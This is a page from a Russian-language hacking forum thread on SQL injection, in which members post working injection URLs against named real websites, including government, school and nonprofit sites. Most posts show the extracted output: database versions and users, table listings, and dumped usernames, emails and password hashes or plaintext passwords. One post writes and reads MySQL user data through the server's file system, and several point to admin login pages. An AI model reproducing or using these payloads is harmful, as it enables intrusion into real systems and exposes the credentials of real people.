SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.welfarerightsact.org/category.php?id=-30+union+select+1,2,3,4,5,6,7,8,9,10+/*+

    PR5
    http://www.corby.ca/portfolio_category.php?brandid=-12'+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13+--+&catid=1&productid=34
    corbydb

    PR5
    http://www.npla.de/onda/content.php?id=-753+union+select+1,2,concat_Ws(0x3a3a,uid,name,uname,email,pass,level,user_icq),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+xoops_users+limit+1,1+--+
    1::Admin::admin::[email protected]::07db5e7ee6906689992fd5f37c696ec1::1:
     
    1 person likes this.
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.skalinternationalkenya.org/young.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7+from+members
    skalkenya@localhost:skalkenya_site:4.1.20

    Code:
    http://www.skalinternationalkenya.org/young.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7+from+members
    Code:
    tadamji:c14b78e294c7e1f836d2938a93626654e0235c6b
    MySQL5 хэш. Расшифровать не удалось.

    Code:
    http://www.etrek.it/young.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11
    wta_etrek@localhost:wta_etrek:5.0.32-Debian_7etch5-log
     
    #9462 mailbrush, 25 May 2009
    Last edited: 25 May 2009
    1 person likes this.
  3. _Quest_

    _Quest_ Member

    Joined:
    21 May 2009
    Messages:
    11
    Likes Received:
    12
    Reputations:
    3
    ooo-systema.ru/?p=faq.php&mA=8&ar=2+and+1=2+union+select+1,user() ,3,4,5,6--

    http://exmoney.biz/news.php?id=-40+union+select+concat_ws(0x3a,login,password),2,3,4,5+from+partners+limit+3,1

    http://anyjob.info/861.htm?t=251+union+select+1,2,3,4,5,user(),7--
     
  4. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    http://www.moto95.ru/shop.php?ID=-14+union+select+1,2,3,4,version(),user(),darabase(),8,9,10,11,12,13,14,15,16,17,18,19+

    4я ветка.
    таблиц не нашел
     
    1 person likes this.
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    ПР4
    http://www.intensive.ru/php/content.php?group=1&id=-904+union+select+1,login,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+users+/*+

    http://www.algarve-live.de/landundleute/index.php?cat=11400&id2=-1+union+select+database()+/*+&id4=1&id5=1
    DB75363
     
  6. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    http://www.turbo-shop.ru/main.php?topic=-28+UNION+SELECT+0x73716C696E6A666C6431--

     
  7. pelligrim

    pelligrim Elder - Старейшина

    Joined:
    26 Apr 2008
    Messages:
    31
    Likes Received:
    20
    Reputations:
    0
    1.
    HTML:
    http://www.cra.qc.ca/newsarticle.php?id=72+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13/*
    4.0.16-standard
    gccdb
    gccdb@localhost

    2.
    HTML:
    http://www.reline.ru/cgi-bin/show_jurid.pl?city=msk&id=-75+union+select+1,2,version(),database(),user(),6+from+users--
    4.1.21
    db00011932
    root@localhost

    3. Швейцарские часы

    HTML:
    http://www.luxwatch.ru/view_statia.phtml?id=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6/*
    5.0.27-log:bestwatch:bestwatch@localhost

    интересные таблицы:
    qqwatch:users
    mysql:user
    mysql:db
    bestwatch:ssp2g_admins

     
  8. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 6]
    Code:
    http://www.manomet.org/WHSRN/viewsite-new.php?id=-67+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
    5.0.77-community:manomet_whsrn:manomet_whsrn@localhost

    Code:
    http://www.manomet.org/WHSRN/viewsite-new.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,group_concat(table_name),28+from+information_schema.tables
    http://www.manomet.org/WHSRN/viewsite-new.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,group_concat(column_name),28+from+information_schema.columns+where+table_name=0x7573657273
    http://www.manomet.org/WHSRN/viewsite-new.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a,email,level,name,password),28+from+users+limit+[COLOR="Red"]x[/COLOR],1
    email:level:name:password
     
    1 person likes this.
  9. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Blind

    http://12info.ru./modules/catalog/product.php?id=101+and+substring(version(),1,1)=4--
     
    _________________________
  10. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://baikal-iwf.ru/main/bar.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5

    5.0.67-log:[email protected]:u15196_3

    http://baikal-iwf.ru/main/bar.php?id=-8+union+select+1,2,concat_ws(0x3a,email,username,password,accesslevel),4,5+from+users

    [email protected]:baikal:baikal:0

    PR 2, ТИЦ 20

    ----------------------

    http://www.wamza.com/bar.php?id=-10042+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,16,18,19,20,21,22,23,24

    5.0.45:[email protected]:wamza


    http://www.wamza.com/bar.php?id=-10042+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,16,18,19,20,21,22,23,24+from+users

    PR 2

    ----------------------

    http://www2.hnk.hr/hr/novosti.php?id=385+union+selecT+1,2,concat_ws(0x3a,version(),useR(),database()),4,5


    5.0.32-Debian_7etch10-log:hnk@localhost:hnk

    таблицы:
    http://www2.hnk.hr/hr/novosti.php?id=385+union+selecT+1,2,table_name,4,5+from+information_schema.tables

    поля таблицы users
    http://www2.hnk.hr/hr/novosti.php?id=385+union+selecT+1,2,column_name,4,5+from+information_schema.columns+where+table_name=0x7573657273


    http://www2.hnk.hr/hr/novosti.php?id=385+union+selecT+1,2,concat_ws(0x3a,user_id,type,first_name,last_name,email,login,password),4,5+from+users

    4:A:Zlatko:Vidackovic:zlatko:monografija
     
    #9470 AlexSatter, 26 May 2009
    Last edited: 26 May 2009
  11. Scorpion.

    Scorpion. Banned

    Joined:
    25 May 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Скуль:
    Code:
    http://www.tsekh.ru/prepod.php?id=-3+union+select+1,2,3,4,5,6--
    Version()
    Code:
    http://www.tsekh.ru/prepod.php?id=-3+union+select+version(),2,3,4,5,6--
    4.1.22 =(
    infa:
    Code:
    http://www.tsekh.ru/prepod.php?id=-3+union+select+concat_ws(0x3a,user(),database()),2,3,4,5,6--
    User() [email protected]
    Database() aktzal_tsekh
     
  12. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://dokuzpara.dagschool.com/novosti.php?id=-902+union+select+1,concat_ws(0x3a,version(),useR(),database()),3,4,5


    4.1.22-log:izberg@localhost:wwwizbergru
     
  13. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    в добавок к dokuzpara.dagschool.com

    основной сайт так же уязвим:

    http://dagschool.com/news.php?id=139+and+substring(version(),1,1)=4--

    админка: http://dagschool.com/admin/

    PR 4
     
    #9473 AlexSatter, 26 May 2009
    Last edited: 26 May 2009
    1 person likes this.
  14. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    ТИЦ: 100
    PR: 4
    какой то там торрент))

    http://baratro.ru/details.php?id=-30051'+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

    5.0.45

    http://baratro.ru/details.php?id=-30051'+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_sche ma.tables+group+by+table_schema+limit+ 1,1/*

    categories,comments,description,torrents,ban
     
    _________________________
  15. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    gorod@localhost
    5.1.16-beta
    gorod
     
  16. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Site: old.yangsan.go.kr

    Database info: yangsan@localhost::yangsan::4.0.23-standard-log
    http://old.yangsan.go.kr/yangsan-city/sub_1doc/news/toogo/view.php?id=-1074+union+select+1,2,3,4,concat_ws(0x3a3a,user(),database(),version()),6,7,8,9,10,11,12,13,14

    Запись в файл:
    http://old.yangsan.go.kr/yangsan-city/sub_1doc/news/toogo/view.php?id=-1074+union+select+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11,12,13,14+from+mysql.user+into+outfile+'/tmp/mysql.user'

    Чтение из файла:
    http://old.yangsan.go.kr/yangsan-city/sub_1doc/news/toogo/view.php?id=-1074+union+select+1,2,3,4,load_file('/tmp/mysql.user'),6,7,8,9,10,11,12,13,14
     
  17. Amoura

    Amoura Elder - Старейшина

    Joined:
    23 Jan 2008
    Messages:
    237
    Likes Received:
    148
    Reputations:
    46
    http://www.iecah.org/novedad.php?id=-29+union+select+user(),version(),database(),4--


    iecah
    5.0.32-Debian_7etch8-log
    iecah@localhost
     
  18. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    PR2

    4.1.22-standard
     
    3 people like this.
  19. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Любителем экзотического вывода посвещается....

    <<Монтаж сетей скс и ЛВС, локальной сети, структурированные кабельные и компьютерные системы>>
    Code:
    http://www.cnts-sks.ru/index.php?id=-104+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--+
    Code:
    http://www.cnts-sks.ru/admin/login.php
    4.1.21-log*:*udb3176*:*Uwww3176S@localhost*:*portbld-freebsd6
     
    1 person likes this.
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    blind

    http://www.vegatur.ru/index.php?tours=get&id=1331+and+substring(version(),1,1)=5--

    ######################################
    Тайвань :D

    http://www.atrie.com.tw/about.php?mode=1&id=-1'+union+select+1,2,3,concat_w s(0x3a,database(),user(),ve rsion()),5,6,7/*

    atrie:atrie@localhost:4.1.20-log

    ######################################
    blind

    http://www.superlux.com.tw/en/earphone/show_product.php?id=1+and+substring(version(),1,1)=3--
     
    _________________________
    #9480 HAXTA4OK, 26 May 2009
    Last edited: 26 May 2009
Thread Status:
Not open for further replies.